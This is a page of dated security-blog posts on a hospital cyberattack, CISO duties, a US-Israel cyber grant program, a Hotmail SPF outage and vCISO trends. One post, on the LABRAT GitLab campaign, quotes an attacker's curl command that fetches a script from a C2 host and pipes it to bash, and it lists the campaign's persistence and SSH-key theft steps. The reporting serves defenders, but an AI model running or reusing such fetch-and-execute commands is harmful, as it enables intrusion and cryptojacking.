One of Mississippi’s largest hospital systems, Singing River Health System, suffered a cyberattack last week, leading to the shutdown of various internal services. The hospital system, which operates multiple hospitals and clinics along the Gulf Coast, detected unusual activity on its network and is cooperating with law enforcement. As a result of the attack, certain internal systems were taken offline to ensure their integrity during the investigation. The hospital’s IT security team is working to restore the offline systems, but the process is expected to take time. The hospital has not confirmed whether the attack involved ransomware or if a ransom will be paid. Patient services, including lab test results and radiology exams, are facing delays due to the attack. The incident highlights the ongoing challenges that hospitals face from cyberattacks, as this year has seen several healthcare institutions targeted by such attacks.
https://therecord.media/mississippi-hospital-system-takes-services-offline-after-cyberattack
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blog | DISC llc is listed on The vCISO Directory
Aug 22 2023
The complex world of CISO responsibilities
A Chief Information Security Officer (CISO) is vital for safeguarding an organization’s digital assets. They oversee sensitive data security, combat cyber threats, and uphold data integrity. The CISO devises security strategies, partners with stakeholders, and addresses vulnerabilities. The Help Net Security roundup showcases insights from experts through recorded videos, highlighting the pivotal responsibilities and challenges that characterize the role of CISOs.
Complete videos
- Josh Yavor, CISO at Tessian, offers a personal perspective on dealing withĀ burnout as a CISO.
- Kaus Phaltankar, CEO at Caveonix discusses how in todayās complex multi-cloud landscape, theĀ role of CISOsĀ is more crucial than ever.
- Daniel Deeney, CEO at Paladin Cloud, discusses howĀ companies face difficultiesĀ identifying security threats within cloud environments.
- Chris Groot, General Manager of Cove Data Protection at N-able, discusses enterpriseĀ CISOsā challengesĀ with disaster recovery.
DISC InfoSec previous posts on CISO topic
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blog
Aug 21 2023
Israel and US to Invest $3.85 Million in projects for critical infrastructure protection through the BIRD Cyber Program
Israel and US government agencies announced the BIRD Cyber Program, an investment of roughly $4M in projects to enhance the cyber resilience of critical infrastructure.
The BIRD Cyber Program is a joint initiative from the Israel National Cyber Directorate (INCD), the Israel-US Binational Industrial Research and Development (BIRD) Foundation, and the US Department of Homeland Security (DHS) Science and Technology Directorate (S&T) to promote projects to enhance the cyber resilience of critical infrastructure in both countries.
The program is managed by the BIRD Foundation, a non-profit organization that supports joint research activities between Israeli and American organizations. The initiative plans to invest $3.85 million in projects to develop cutting-edge defense solutions.
The total value of the projects will be increased to approximately $10 million through private-sector funding.
The initiative aims at developing new solutions for detecting and preventing cyberattacks, technologies to protect sensitive data, and improve the security of critical infrastructure systems.
The BIRD foundation provides funding of up to 50% for each approved project, it is important to note that no repayment is required if the project does not reach the sales stage.
The BIRD Cyber Program also provides mentoring for the growth of the projects.
Below are the eligibility requirements for the BIRD Cyber Program:
- The project must be a joint venture between an Israeli and an American company.
- The project must focus on cybersecurity or emerging technologies.
- The project must have the potential to enhance the cyber resilience of critical infrastructure.
- The project must be at the prototype or early development stage.
The BIRD Cyber Program will award four grants for projects related the maritime sectors, airport and air traffic, and industrial control systems (ICS).
Below are the projects approved:
- Rescana (Tel-Aviv, Israel) and Trend Micro (Irving, TX) ā which will develop an operational cyber threat intelligence capability to inform cyber risk maritime decision-making.
- Salvador Technologies (Rehovot, Israel) and Bastazo (Fayetteville, AR) ā which will develop a solution for Industrial Control Systems (ICS) vulnerability management, monitoring, and rapid recovery from cyber-attacks.
- Cyber 2.0 (Rishon Letzion, Israel) and Cincinnati / Northern Kentucky International Airport (Hebron, KY) ā which will develop a platform for airports and air traffic that provides continuous cyber visibility, real-time monitoring, and data traffic detection to reduce risks and boost compliance with regulations.
- A fourth project ā which will develop an airport cyber protection solution across the entire attack surface.
The above projects were submitted in response to the first BIRD Cyber call.
āWe are pleased to jointly invest with our Israeli partners in these innovative projects and anticipate that they will deliver new capabilities to enhance the cybersecurity posture and overall resilience of vital critical sectors in both nations,āĀ saidĀ Megan Mahle, Director of the DHS S&T Office of Industry Partnerships. Aviram Atzaba, Executive Director for International Cooperation of INCD, added: āWe are proud to partner with DHS to develop cutting-edge solutions for small and medium-sized businesses and critical infrastructure cybersecurityā¦ The BIRD mechanism continues to strengthen the strategic alliance between Israel and the United States.ā
CRITICAL INFRASTRUCTURE PROTECTION: Agencies Need to Assess Adoption of Cybersecurity GuidanceĀ
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blog
Aug 21 2023
LABRAT Campaign Strikes: GitLab Flaw Exploited For Cryptojacking and Proxyjacking
A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.
LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.
The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.
Technical Analysis ā GitLab exploitation
The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.
- Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server.
curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash - The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
- Check whether or not the watchdog process was already running to kill it.
- Delete malicious files if they exist from a previous run.
- Disable Tencent Cloud and Alibabaās defensive measures, a recurring feature of many attackers.
- Download malicious binaries.
- Create a new service with one of these binaries and if root, ran it on the fly.
- Modify various cron files to maintain persistence.
- Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
- Deletes any evidence that the above processes may have generated.
For more details on LABRAT campaign:
https://hackersonlineclub.com/gitlab-exploited-labrat-cryptojacking-and-proxyjacking/
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blog
Aug 20 2023
Microsoft DNS boo-boo breaks Hotmail for users around the globe
https://www.theregister.com/2023/08/21/microsoft_dns_booboo_breaks_hotmail
Someone at Microsoft has some explaining to do after a messed up DNS record caused emails sent from Hotmail accounts using Microsoft’s Outlook service to be rejected and directed to spam folders starting on Thursday.
Late on Thursday evening, Hotmail users began reporting that some emails were being returned with errors related to Sender Policy Framework (SPF), and thus recipient email services were unable “to confirm that [a] message came from a trusted location.”
SPF, for those unfamiliar with it, is a method of outbound email authentication that helps avoid email spoofing, impersonation and phishing. If, for example, a service like Hotmail were to have one of its subdomains removed from the DNS TXT record that stores its SPF list, then recipient services may assume it’s junk.
And that appears to be just what happened.
Reddit users posting to the Sysadmin subreddit verified they were experiencing SPF issues with Hotmail. One user pulled up Hotmail’s SPF record and found that Redmond had made two changes: removing spf.protection.outlook.com from the record, and changing the SPF failure condition from soft to hard. That meant any suspicious messages from Hotmail should be rejected rather than just sent to spam.
Microsoft support forum advisors confirmed that the issue was known, which was further confirmed by a look at theĀ Office service status page. Per Microsoft: “Some users may receive non-delivery reports when attempting to send emails from hotmail.com.”Ā
At time of writing, the status page indicated that “a recent change to email authentication” was the potential root cause of the outage. Microsoft said it made a configuration change to remediate impact, but shortly after said the problem may have been worse than it appeared at first glance.
“We’ve identified that additional configuration entries are impacted, and we’re implementing further configuration changes to resolve the issue,” Microsoft said. Not long after that was posted, Microsoft indicated configuration changes were complete and the problem was fixed.
Microsoft didn’t respond to our questions about the incident, only saying the issue had been resolved.
Aug 20 2023
Product showcase: Free email security test by ImmuniWeb Community Edition
In 2022, global losses from business email compromise (BEC) and email account compromise (EAC) attacks reached a record-breaking $43 billion, as reported by the FBI. Major cybersecurity companies like Microsoft and Trend Micro noted a surge in advanced phishing attacks earlier in the year, resulting in significant financial damages to organizations of all sizes. Concerns have risen among security experts about the potential for a surge in email credential attacks due to the widespread availability of generative AI technologies like ChatGPT. These attacks could range from simple social engineering tactics to complex schemes involving domain-squatting and spear-phishing, taking advantage of previously stolen personal information. Despite increasing spending on corporate cybersecurity, the risk of such attacks continues to rise.
To aid organizations in evaluating their vulnerability to email-related security, privacy, and compliance risks, ImmuniWeb has introduced a free email security test as part of its Community Edition. This online tool performs over 200,000 security scans daily, helping small and medium-sized enterprises, educational institutions, non-profits, municipal governments, and individual developers identify a wide range of cybersecurity and compliance issues. The aim is to bolster foundational cyber resilience and information security for these entities.
for more details on free email security test:
Product showcase: Free email security test by ImmuniWeb Community Edition
The Art of Email Security: Putting Cybersecurity In Simple Terms
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blog
Ā
Aug 20 2023
State of Virtual CISO
Cynomi Study Reveals Number of MSPs Providing Virtual CISO Services Will Grow Fivefold By Next Year
The frequency of cyberattacks is increasing, particularly targeting smaller businesses. However, most small and mid-size companies cannot afford a full-time security professional. To address this, they are turning to vCISO (virtual Chief Information Security Officer) services offered by Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs). These services provide access to external cybersecurity experts at a lower cost than hiring an in-house CISO.
A report by Cynomi, based on a survey of 200 executives in the U.S. and Canada, shows the rising demand for vCISO services among SMBs and how MSPs and MSSPs are responding to this demand. The report reveals that 84% of those not currently offering vCISO services but plan to do so by the end of 2024. The number of providers offering these services has been consistently growing, with 8% in 2022, 28% in 2023, and a projected 45% in 2024.
MSPs and MSSPs are motivated to offer vCISO services due to anticipated increased revenue, higher margins, easy upselling of other cybersecurity services, and enhanced client engagement. Although they foresee challenges such as limited in-house security knowledge and a lack of skilled cybersecurity personnel, vCISO platforms help mitigate these concerns.
Cynomi, a leading vCISO platform provider, aims to conduct annual studies on the growing trend of the vCISO role. They have also created a directory of prominent vCISO service providers to help SMBs find trusted security partners, offering details about services and technology platforms used by each provider.
DISC InfoSec Previous posts on vCISO
InfoSec tools | InfoSec services | InfoSec books | Follow our blog
Aug 19 2023
How CISOs break down complex security challenges
In the provided article, the author, who is a Chief Information Security Officer (CISO), discusses the challenges and strategies related to maintaining technical expertise while effectively communicating complex cybersecurity issues to stakeholders in a comprehensible manner.
The author emphasizes the importance of understanding the intricacies of technology in order to secure it effectively. This philosophy has driven the author to stay up-to-date with technology trends, collaborate with other security experts, and maintain a deep connection with their technical teams. The author also highlights the value of using simple metaphors to explain complex concepts, leveraging their strong technical background to convey information in a way that is easier for non-technical stakeholders to grasp.
In the context of managing cyber resilience efforts across an enterprise, the author draws parallels to managing different types of risk, categorizing them as good and bad risks. Good risks are those that contribute to business growth and innovation, while bad risks are associated with lacking proper planning and security measures. Balancing these risks requires strong relationships across the organization and constant communication.
The article also discusses the impact of digital initiatives and rapid digital transformation on the CISO’s role. While digital transformation can enhance efficiency and lower risks, challenges arise when new technologies like cloud or SaaS services are introduced without a clear understanding of their security implications. Collaboration between technology vendors, cybersecurity companies, and leadership teams is essential to address these challenges.
In the face of external events that test organizational resilience, the author presents four key principles for effective leadership: communication, agility, constant learning, and adaptability. These principles help leaders navigate uncertainties, learn from experiences, and handle change more effectively.
For a newly appointed CISO tasked with explaining complex cyber regulations to the board, the author suggests researching the backgrounds and industries of board members to tailor explanations to their perspectives. Comparisons to regulations in related industries or significant news events can help the board better understand the issues and recognize the CISO’s commitment to understanding the regulatory landscape.
In summary, the article underscores the need for CISOs to balance technical expertise with effective communication, employing metaphors to simplify complex concepts, and building strong relationships to manage cyber risks across the enterprise. It also highlights the challenges and strategies associated with digital transformation, organizational resilience, and succinctly communicating complex regulations to the board.
DISC InfoSec previous posts on CISO topic
InfoSec tools | InfoSec services | InfoSec books | Follow our blog
« Previous Page — Next Page »
